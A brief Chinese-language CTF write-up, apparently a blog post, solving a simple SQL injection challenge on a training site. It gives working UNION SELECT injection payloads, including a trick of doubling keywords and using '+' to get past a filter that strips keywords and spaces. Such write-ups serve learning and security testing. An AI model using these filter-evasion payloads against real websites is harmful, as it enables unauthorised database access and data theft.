1. 程式人生 > >Web簡單的SQL注入

Web簡單的SQL注入

實驗吧連結: http://ctf5.shiyanbar.com/423/web/
解題思路:研究了好久,看了writeup才知道
1)在文字框輸入1,提交,連結變成id=1
2)在檔案框輸入1‘,提交,報錯,判斷存在注入。

3)初步預計後臺表為flag,欄位名為flag,需要構造union select flag from flag來執行。
4)根據第二步的報錯資訊看,多加個‘,後面的語句需要再構造一個條件來結束’,注入語句為:1‘ union select flag from flag where ‘t’=’t

執行後報錯:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
分析:根據錯誤資訊發現只有變量了,其他的關鍵字都被過濾了。
5)把關鍵字寫2遍提交,發現如下報錯: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
分析:發現空格被過濾了
6))使用+號在空格之前連線:

http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t

得到KEY:flag{xxxxxx}